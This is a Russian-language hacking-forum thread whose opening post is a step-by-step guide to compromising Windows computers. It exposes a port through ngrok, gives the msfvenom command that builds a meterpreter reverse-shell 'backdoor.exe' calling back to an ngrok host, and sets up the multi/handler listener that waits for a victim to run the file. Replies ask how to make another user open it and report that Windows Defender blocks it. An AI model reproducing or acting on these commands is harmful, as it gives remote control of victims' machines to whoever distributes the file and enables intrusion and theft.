Загрузка...

Взлом Windows с помощью Metasploit на Kali Linux

Тема в разделе Kali Linux создана пользователем PhtoNap26 16 дек 2021. (поднята 16 дек 2021) 2747 просмотров

Загрузка...
  1. PhtoNap26
    PhtoNap26 Автор темы 16 дек 2021 1 9 дек 2021
    Все на самом деле очень просто!

    -----------------------------------------------


    Вот что нужно:
    Kali Linux(в нем уже должен быть установлен Metasploit)
    Ngrok(ngrok будет использоваться для открытия портов)

    -----------------------------------------------

    Для начала мы открываем порты в ngrok


    Для этого в терминале прописываем: ./ngrok tcp (и порт который хотите открыть например:432)
    После нажатия Enter выводится вот такое окно:
    [IMG]
    Это означает что мы открыли порт!
    (ЕСЛИ ЭТО ОКНО ЗАКРЫТЬ ТО ПОРТ ЗАКРОЕТСЯ И НЕЧЕГО НЕ БУДЕТ РАБОТАТЬ)


    -----------------------------------------------

    Открываем ещё терминал и прописываем туда:msfconsole
    Происходит загрузка Metasploita, после загрузки должно быть такое окно:
    [IMG]

    Оно означает что Metasoploit открылся!
    Необходимо свернуть окно с метослоитом!

    -----------------------------------------------

    Дальше открываем новую вкладку с терминалом и прописываем там следующую команду для создания Metasploita:msfvenom -p windows/meterpreter/reverse_tcp lhost=6.tcp.ngrok.io lport=11630 -f exe -o backdoor.exe
    И так для начало разберём в что надо поменять в этой команде
    где написано lhost=6.tcp.ngrok.io надо поменять цифру 6 на ту которую вам выдал ngrok у меня это цифра 6
    а где написано lport=11630 надо написать тот порт который выдал нам ngrok в моем случае это 14016

    Все это на скриншоте!

    И так меняем это все на свои цифры

    Теперь получается вот такая строка:msfvenom -p windows/meterpreter/reverse_tcp lhost=6.tcp.ngrok.io lport=14016 -f exe -o backdoor.exe
    (Кстати в конце где написано backdoor.exe это название его можно поменять!)
    Нажимаем Enter
    После этого должно появится это:
    [IMG]

    Мы только что сделали Metosploit он сохраняется в папку root
    Но он ещё не готов!

    -----------------------------------------------

    И так его нужно настроить
    Открываем терминал где был запущен Metasploit

    И прописываем там следующие команды:
    use multi/handler
    Потом
    set payload windows/meterpreter/reverse_tcp
    Дальше
    set LHOST localhost

    (несмотря на то-что там написано localhost все ровно можно будет подключать из любой точки мира!)
    Продолжаем
    set LPORT 443(здесь вместо порта 443 пишем порт который вы вводили при открытии портов, в моем случае 432!)

    -----------------------------------------------

    Все мы его настроили!
    Но чтобы начать взлом или проверки безопасности) надо прописать команду exploit!
    И все Metasploit будет ждать пока кто-нибудь откроет ваш Metasploit!
    [IMG]
    Вот и все готово, надеюсь кому-то надо и помогло!
    Всем спасибо кто прочитал эту статью!:flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot::flexing_parrot:



     
  2. XYX_inactive
    а как октрыть метасплоит другому юзеру?
     
  3. MacMen
    Хорошая тема, но кажется что капипаста взятая с другого борта
     
  4. RSPARKER
    RSPARKER 16 янв 2022 2238 19 фев 2018
    Оформление читабельно. Но немного бы ясностей внести в тему. Как должен запустится метасплоит и тд.
     
  5. Vova906
    Vova906 13 фев 2022 0 24 мар 2021
    антивирус 10 винды говорит (иди гуляй)
     
Top